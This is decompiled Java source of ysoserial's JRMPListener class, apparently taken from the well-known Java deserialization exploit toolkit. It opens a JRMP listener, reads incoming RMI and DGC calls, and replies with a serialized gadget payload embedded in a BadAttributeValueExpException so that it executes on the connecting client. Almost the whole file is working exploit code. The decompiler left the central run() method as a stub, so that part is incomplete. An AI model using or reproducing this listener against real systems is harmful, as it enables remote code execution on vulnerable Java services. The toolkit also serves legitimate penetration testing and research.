package ysoserial.exploit;

import java.io.DataInputStream;
import java.io.DataOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectStreamClass;
import java.io.Serializable;
import java.net.ServerSocket;
import java.net.Socket;
import java.net.URL;
import java.rmi.MarshalException;
import java.rmi.server.ObjID;
import java.rmi.server.UID;
import java.util.Arrays;
import javassist.ClassClassPath;
import javassist.ClassPool;
import javassist.CtClass;
import javax.management.BadAttributeValueExpException;
import javax.net.ServerSocketFactory;
import ysoserial.exploit.JRMPClient;
import ysoserial.payloads.ObjectPayload;
import ysoserial.payloads.util.Reflections;

/* loaded from: input_file:ysoserial/exploit/JRMPListener.class */
public class JRMPListener implements Runnable {
    private int port;
    private Object payloadObject;
    private ServerSocket ss;
    private Object waitLock = new Object();
    private boolean exit;
    private boolean hadConnection;
    private URL classpathUrl;

    /* loaded from: input_file:ysoserial/exploit/JRMPListener$Dummy.class */
    public static class Dummy implements Serializable {
        private static final long serialVersionUID = 1;
    }

    public JRMPListener(int i, Object obj) throws NumberFormatException, IOException {
        this.port = i;
        this.payloadObject = obj;
        this.ss = ServerSocketFactory.getDefault().createServerSocket(this.port);
    }

    public JRMPListener(int i, String str, URL url) throws IOException {
        this.port = i;
        this.payloadObject = makeDummyObject(str);
        this.classpathUrl = url;
        this.ss = ServerSocketFactory.getDefault().createServerSocket(this.port);
    }

    public boolean waitFor(int i) {
        try {
            if (this.hadConnection) {
                return true;
            }
            System.err.println("Waiting for connection");
            synchronized (this.waitLock) {
                this.waitLock.wait(i);
            }
            return this.hadConnection;
        } catch (InterruptedException e) {
            return false;
        }
    }

    public void close() {
        this.exit = true;
        try {
            this.ss.close();
        } catch (IOException e) {
        }
        synchronized (this.waitLock) {
            this.waitLock.notify();
        }
    }

    public static final void main(String[] strArr) {
        if (strArr.length < 3) {
            System.err.println(JRMPListener.class.getName() + " <port> <payload_type> <payload_arg>");
            System.exit(-1);
            return;
        }
        Object makePayloadObject = ObjectPayload.Utils.makePayloadObject(strArr[1], strArr[2]);
        try {
            int parseInt = Integer.parseInt(strArr[0]);
            System.err.println("* Opening JRMP listener on " + parseInt);
            new JRMPListener(parseInt, makePayloadObject).run();
        } catch (Exception e) {
            System.err.println("Listener error");
            e.printStackTrace(System.err);
        }
        ObjectPayload.Utils.releasePayload(strArr[1], makePayloadObject);
    }

    /* JADX WARN: Finally extract failed */
    /* JADX WARN: Removed duplicated region for block: B:62:0x01ab A[Catch: SocketException -> 0x01de, Exception -> 0x01e0, TryCatch #6 {SocketException -> 0x01de, Exception -> 0x01e0, blocks: (B:3:0x0002, B:5:0x0009, B:8:0x0015, B:11:0x0055, B:21:0x0096, B:22:0x00bb, B:28:0x00d4, B:30:0x00e2, B:31:0x00fa, B:37:0x00ee, B:32:0x0114, B:33:0x013f, B:34:0x014c, B:24:0x0124, B:25:0x0133, B:16:0x0083, B:17:0x008a, B:40:0x004d, B:48:0x0159, B:50:0x0169, B:51:0x016d, B:53:0x0174, B:57:0x017d, B:58:0x0187, B:43:0x0195, B:44:0x0198, B:45:0x01a3, B:62:0x01ab, B:63:0x01af, B:65:0x01b6, B:72:0x01c6, B:73:0x01ca, B:75:0x01d1, B:77:0x01da), top: B:2:0x0002 }] */
    /* JADX WARN: Removed duplicated region for block: B:65:0x01b6 A[Catch: SocketException -> 0x01de, Exception -> 0x01e0, TryCatch #6 {SocketException -> 0x01de, Exception -> 0x01e0, blocks: (B:3:0x0002, B:5:0x0009, B:8:0x0015, B:11:0x0055, B:21:0x0096, B:22:0x00bb, B:28:0x00d4, B:30:0x00e2, B:31:0x00fa, B:37:0x00ee, B:32:0x0114, B:33:0x013f, B:34:0x014c, B:24:0x0124, B:25:0x0133, B:16:0x0083, B:17:0x008a, B:40:0x004d, B:48:0x0159, B:50:0x0169, B:51:0x016d, B:53:0x0174, B:57:0x017d, B:58:0x0187, B:43:0x0195, B:44:0x0198, B:45:0x01a3, B:62:0x01ab, B:63:0x01af, B:65:0x01b6, B:72:0x01c6, B:73:0x01ca, B:75:0x01d1, B:77:0x01da), top: B:2:0x0002 }] */
    @Override // java.lang.Runnable
    /*
        Code decompiled incorrectly, please refer to instructions dump.
        To view partially-correct add '--show-bad-code' argument
    */
    public void run() {
        /*
            Method dump skipped, instructions count: 489
            To view this dump add '--comments-level debug' option
        */
        throw new UnsupportedOperationException("Method not decompiled: ysoserial.exploit.JRMPListener.run():void");
    }

    private void doMessage(Socket socket, DataInputStream dataInputStream, DataOutputStream dataOutputStream, Object obj) throws Exception {
        System.err.println("Reading message...");
        int read = dataInputStream.read();
        switch (read) {
            case 80:
                doCall(dataInputStream, dataOutputStream, obj);
                break;
            case 81:
            case 83:
            default:
                throw new IOException("unknown transport op " + read);
            case 82:
                dataOutputStream.writeByte(83);
                break;
            case 84:
                UID.read(dataInputStream);
                break;
        }
        socket.close();
    }

    private void doCall(DataInputStream dataInputStream, DataOutputStream dataOutputStream, Object obj) throws Exception {
        ObjectInputStream objectInputStream = new ObjectInputStream(dataInputStream) { // from class: ysoserial.exploit.JRMPListener.1
            @Override // java.io.ObjectInputStream
            protected Class<?> resolveClass(ObjectStreamClass objectStreamClass) throws IOException, ClassNotFoundException {
                if ("[Ljava.rmi.server.ObjID;".equals(objectStreamClass.getName())) {
                    return ObjID[].class;
                }
                if ("java.rmi.server.ObjID".equals(objectStreamClass.getName())) {
                    return ObjID.class;
                }
                if ("java.rmi.server.UID".equals(objectStreamClass.getName())) {
                    return UID.class;
                }
                throw new IOException("Not allowed to read object");
            }
        };
        try {
            ObjID read = ObjID.read(objectInputStream);
            if (read.hashCode() == 2) {
                objectInputStream.readInt();
                objectInputStream.readLong();
                System.err.println("Is DGC call for " + Arrays.toString((ObjID[]) objectInputStream.readObject()));
            }
            System.err.println("Sending return with payload for obj " + read);
            dataOutputStream.writeByte(81);
            JRMPClient.MarshalOutputStream marshalOutputStream = new JRMPClient.MarshalOutputStream(dataOutputStream, this.classpathUrl);
            marshalOutputStream.writeByte(2);
            new UID().write(marshalOutputStream);
            BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException((Object) null);
            Reflections.setFieldValue(badAttributeValueExpException, "val", obj);
            marshalOutputStream.writeObject(badAttributeValueExpException);
            marshalOutputStream.flush();
            dataOutputStream.flush();
            this.hadConnection = true;
            synchronized (this.waitLock) {
                this.waitLock.notifyAll();
            }
        } catch (IOException e) {
            throw new MarshalException("unable to read objID", e);
        }
    }

    protected static Object makeDummyObject(String str) {
        try {
            ClassLoader classLoader = new ClassLoader() { // from class: ysoserial.exploit.JRMPListener.2
            };
            ClassPool classPool = new ClassPool();
            classPool.insertClassPath(new ClassClassPath(Dummy.class));
            CtClass ctClass = classPool.get(Dummy.class.getName());
            ctClass.setName(str);
            return ctClass.toClass(classLoader).newInstance();
        } catch (Exception e) {
            e.printStackTrace();
            return new byte[0];
        }
    }
}
